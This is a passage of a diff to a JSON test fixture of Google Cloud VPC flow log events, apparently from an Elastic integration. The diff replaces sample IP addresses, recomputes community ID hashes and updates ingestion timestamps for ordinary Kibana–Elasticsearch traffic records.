"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.762958327Z", "end": "2019-06-14T03:49:54.108975753Z", @@ -8560,10 +8560,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33874, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -8577,7 +8577,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5AIfpIZXAUHToCeVBhXgBuugIac=", + "community_id": "1:kUsQhMSOvL5RMyh4vWwz55fq9ss=", "bytes": 149157, "name": "default", "transport": "tcp", @@ -8600,7 +8600,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -8636,8 +8636,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868731300Z", - "original": "{\"insertId\":\"y4wffpfk2ero7\",\"jsonPayload\":{\"bytes_sent\":\"149157\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"74\",\"reporter\":\"SRC\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391624900Z", + "original": "{\"insertId\":\"y4wffpfk2ero7\",\"jsonPayload\":{\"bytes_sent\":\"149157\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"74\",\"reporter\":\"SRC\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.513551480Z", "end": "2019-06-14T03:49:37.933099658Z", @@ -8664,18 +8664,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33968, "bytes": 11108, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 95 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:dMHgvk8guroE0eXkr19X6xQ6X24=", + "community_id": "1:F4uNaOBelKx7k5b/GMkE00x7/lw=", "bytes": 11108, "name": "default", "transport": "tcp", @@ -8697,7 +8697,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -8734,8 +8734,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868734400Z", - "original": "{\"insertId\":\"y4wffpfk2eroe\",\"jsonPayload\":{\"bytes_sent\":\"11108\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"95\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391630400Z", + "original": "{\"insertId\":\"y4wffpfk2eroe\",\"jsonPayload\":{\"bytes_sent\":\"11108\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"95\",\"reporter\":\"DEST\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480430427Z", "end": "2019-06-14T03:49:37.965119632Z", @@ -8762,18 +8762,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33590, "bytes": 67337, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 351 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:LSB085+2dyGfQIXV+wF0qEVVBbM=", + "community_id": "1:hba8zo6o+Om2iBhvTc1A5aHscIQ=", "bytes": 67337, "name": "default", "transport": "tcp", @@ -8795,7 +8795,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -8832,8 +8832,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868738300Z", - "original": "{\"insertId\":\"y4wffpfk2eroa\",\"jsonPayload\":{\"bytes_sent\":\"67337\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391635900Z", + "original": "{\"insertId\":\"y4wffpfk2eroa\",\"jsonPayload\":{\"bytes_sent\":\"67337\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33590},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565116665Z\",\"packets_sent\":\"351\",\"reporter\":\"DEST\",\"rtt_msec\":\"109\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147151100Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147151100Z", "end": "2019-06-14T03:49:59.565116665Z", @@ -8860,18 +8860,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 136375, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 246 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:VqjLGbDeItVznngxat3pnPeGkec=", + "community_id": "1:Z4JXA8xt+j3ewQW8WvNJAPaHMoA=", "bytes": 136375, "name": "default", "transport": "tcp", @@ -8893,7 +8893,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -8930,8 +8930,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868741700Z", - "original": "{\"insertId\":\"y4wffpfk2eroi\",\"jsonPayload\":{\"bytes_sent\":\"136375\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391641300Z", + "original": "{\"insertId\":\"y4wffpfk2eroi\",\"jsonPayload\":{\"bytes_sent\":\"136375\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500483335Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500483335Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -8952,10 +8952,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33690, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -8969,7 +8969,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:WEAf6ne8e1XsbHxRodKfYT1TGbg=", + "community_id": "1:R07THsJrApr+LxzJU52QZR3EPhM=", "bytes": 181424, "name": "default", "transport": "tcp", @@ -8992,7 +8992,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -9028,8 +9028,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868745300Z", - "original": "{\"insertId\":\"y4wffpfk2ero8\",\"jsonPayload\":{\"bytes_sent\":\"181424\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393929808Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391646800Z", + "original": "{\"insertId\":\"y4wffpfk2ero8\",\"jsonPayload\":{\"bytes_sent\":\"181424\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33690,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.393929808Z\",\"packets_sent\":\"241\",\"reporter\":\"SRC\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075867049Z", "end": "2019-06-14T03:49:56.393929808Z", @@ -9056,18 +9056,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33874, "bytes": 9303, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 94 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5AIfpIZXAUHToCeVBhXgBuugIac=", + "community_id": "1:kUsQhMSOvL5RMyh4vWwz55fq9ss=", "bytes": 9303, "name": "default", "transport": "tcp", @@ -9089,7 +9089,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -9126,8 +9126,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868748500Z", - "original": "{\"insertId\":\"y4wffpfk2erol\",\"jsonPayload\":{\"bytes_sent\":\"9303\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391652400Z", + "original": "{\"insertId\":\"y4wffpfk2erol\",\"jsonPayload\":{\"bytes_sent\":\"9303\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933099658Z\",\"packets_sent\":\"94\",\"reporter\":\"DEST\",\"rtt_msec\":\"142\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.513551480Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.513551480Z", "end": "2019-06-14T03:49:37.933099658Z", @@ -9148,10 +9148,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33572, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -9165,7 +9165,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:vae84XmwYYRVAple470fSnJPul0=", + "community_id": "1:yNQZdh5JH2wK9uzpK/mTdNYogpE=", "bytes": 142871, "name": "default", "transport": "tcp", @@ -9188,7 +9188,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -9224,8 +9224,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868751800Z", - "original": "{\"insertId\":\"y4wffpfk2ero4\",\"jsonPayload\":{\"bytes_sent\":\"142871\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821149051Z\",\"packets_sent\":\"77\",\"reporter\":\"SRC\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391657800Z", + "original": "{\"insertId\":\"y4wffpfk2ero4\",\"jsonPayload\":{\"bytes_sent\":\"142871\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33572,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821149051Z\",\"packets_sent\":\"77\",\"reporter\":\"SRC\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470754779Z", "end": "2019-06-14T03:49:51.821149051Z", @@ -9246,10 +9246,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33968, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -9263,7 +9263,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dMHgvk8guroE0eXkr19X6xQ6X24=", + "community_id": "1:F4uNaOBelKx7k5b/GMkE00x7/lw=", "bytes": 158811, "name": "default", "transport": "tcp", @@ -9286,7 +9286,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -9322,8 +9322,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868755100Z", - "original": "{\"insertId\":\"y4wffpfk2eror\",\"jsonPayload\":{\"bytes_sent\":\"158811\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965119632Z\",\"packets_sent\":\"69\",\"reporter\":\"SRC\",\"rtt_msec\":\"201\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480430427Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391663200Z", + "original": 